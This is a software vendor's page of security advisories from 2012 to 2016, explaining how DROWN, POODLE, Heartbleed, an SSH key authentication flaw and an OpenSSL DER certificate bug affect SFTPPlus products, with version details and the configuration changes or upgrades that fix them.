News from security category

The DROWN Attack and SFTPPlus

Thu 03 March 2016 | security

SFTPPlus Server versions 1.6 and newer are not vulnerable to the DROWN attack.

SFTPPlus versions 3 and newer are also not vulnerable to it.

The DROWN attack targets server-side products, thus SFTPPlus client is not vulnerable to it.

SFTPPlus relies on OpenSSL for the SSL and TLS protocols used in implementing the FTPS and HTTPS protocols. The Unix and Linux versions of SFTPPlus use the OpenSSL libraries provided by the operating system. The Windows versions of SFTPPlus use the included OpenSSL libraries.

However, support for SSL version 2 was never available in SFTPPlus, thus SFTPPlus users are not exposed to any vulnerability related to the use of SSL v2. More so, SSL and TLS security contexts are always configured with NO_SSLv2. So, even if you are using an OpenSSL version with support for SSL v2, version 2 is explicitly denied in SFTPPlus.

The SFTP protocol is based on the SSH protocol and is not affected by SSL or TLS bugs.

• • •

SSLv3 POODLE vulnerability and SFTPPlus

Wed 22 October 2014 | security server client

Issue

In late September, a team at Google discovered a serious vulnerability in SSL 3.0, known as “POODLE”.

By exploiting this vulnerability, an attacker can gain access to data send over what is supposed to be a secured connection.

Affected protocols

SFTPPlus Server and Client are affected by SSLv3 POODLE vulnerability for FTPS, HTTPS protocols as well as for the HTTPS web based management tool.

SFTP and SCP protocols are not affected.

This is a design flaw within the SSLv3 protocol itself and is not related to SFTPPlus specific implementation or any other vendor’s implementation.

Solution for SFTPPlus Server

As a way to fix this you should disable SSLv3 protocol and only use TLSv1 for FTPS (explicit or implicit) and HTTPS protocols, including the Local Manager web based administration interface.

To disable SSLv3 in SFTPPlus Server this can be done using the ssl_allowed_methods = tlsv1 configuration options for all vulnerable protocols. For more details see ssl_allowed_methods documentation.

The default configuration options support both SSLv3 and TLSv1. SSLv2 was never enabled as the protocol was also proved vulnerable.

In case you still need to use SSLv3 you should disable the CBC based cipher suites. This means enabling only the RC4-SHA cipher as this is the only cipher not using CBC. To do this, set ssl_cipher_list = RC4-SHA . For more details see ssl_cipher_list documentation.

We will soon release a new version of SFTPPlus Server which will disable SSLv3 by default.

Solution for SFTPPlus Client

SFTPPlus Client can also be configured to only use RC4-SHA cipher using the ciphers = 'RC4-SHA' configuration. For more details see ciphers documentation.

We will soon release a new version of SFTPPlus Client which will disable SSLv3 by default.

• • •

OpenSSL Heartbleed bug and SFTPPlus

Thu 17 April 2014 | security server

SFTPPlus uses OpenSSL only for FTPS protocol. SFTP protocol is not affected by this bug.

On Unix and Linux, SFTPPlus software use the OpenSSL library provided by the operating system. Unix and Linux operating system supported by SFTPPlus (RHEL 4, RHEL5, RHEL6, SLES 11, AIX 5.3) are not affected by this bug as they all use older versions of OpenSSL.

If you use CentOS 6 instead of RHEL 6, you might be affected by this problem and you should update the CentOS 6 system, If you use Ubuntu 12.04 then you should also update the operating system. Security fixes are already available for both CentOS and Ubuntu.

For Windows, SFTPPlus software use OpenSSL version 0.9.8 which is not affected bu this bug.

• • •

Security vulnerability for SSH keys authentication

Mon 22 April 2013 | server security

Monday, 22 April 2013 - we have discovered a security vulnerability affecting SFTPPlus Server version 1.6, 1.7 and 1.8.

Due to an error in checking the SSH key signature, when SSH key authentication is used for a SFTP transfer, a user can obtain server access by using only the public part of the SSH key.

Access with only a public SSH key is still restricted to the specific account for which the public key is enabled. Full server access is not granted.

To exploit this security issue a 3rd party needs to hold a copy of the public SSH key and use it together with a modified SFTP client which allows initiating a SFTP session without requiring a private SSH key.

This does not affect SFTP transfers for which SSH key authentication is not enabled.

This does not affect FTP or FTPS transfers.

This does not affect SFTPPlus Server version 1.5 and below.

This does not affect SFTPPlus Client at any version.

Available fix

To fix this error we have released new versions of SFTPPlus Server for all supported release series.

Update for release series 1.8 together with documentation is available at:

http://www.sftpplus.com/downloads/server/1.8.6.html

http://www.sftpplus.com/documentation/server/v/1.8.6/

Update for release series 1.7 together with documentation is available at:

http://www.sftpplus.com/downloads/server/1.7.21.html

http://www.sftpplus.com/documentation/server/v/1.7.21/

Users of version 1.6 are asked to upgrade to latest version 1.8.6 . Beside the latest security fix, upgrading to 1.8.6 will also provide other fixed and new features.

In case you are not able to upgrade to one of the latest supported versions, please let us know and we will work together in making sure this security error is fixed for your production servers.

We apologize for any inconvenience that may occur as a result of these changes!

• • •

OpenSSL DER certificate vulnerability and SFTPPlus

Thu 26 April 2012 | security

Last week a bug was discovered in all OpenSSL version. This bug can cause various security issues.

More information about the original vulnerability report for OpenSSL can be found from National Cyber Awareness System

A fix was already provided by the OpenSSL team as of 24 of April 2012.

Please note that the bug only affects products using OpenSSL for reading client or server certificates stored in DER format and which were generated by an untrusted Certificate Authority.

The vulnerability does not apply in the case of using certificates stored in PEM format.

The vulnerability only affects the FTPS and HTTPS transfers from SFTPPlus products, since SFTPPlus Client and SFTPPLus Server reads client and server certificates from various formats, including DER format. If the DER certificates was generated by a trustworthy Certificate Authority, there are no security vulnerabilities caused by this bug.

The vulnerability can be more easy exploited on Intel X86 and X86_64 CPU architectures, as the other CPU architectures have various security mechanism to prevent this type of security vulnerabilities.

We found it appropriate to let you know about this security issue, while we are working at including the fix into latest SFTPPlus products.

New releases for latest versions of SFTPPlus products will be available in the near future and will include a fix for the security issue described above.

In case you are handling untrusted .DER certificates together with an older version of SFTPPlus products and cannot upgrade to latest version, please let us know and we will provide a security update for the version used in your deployment.

• • •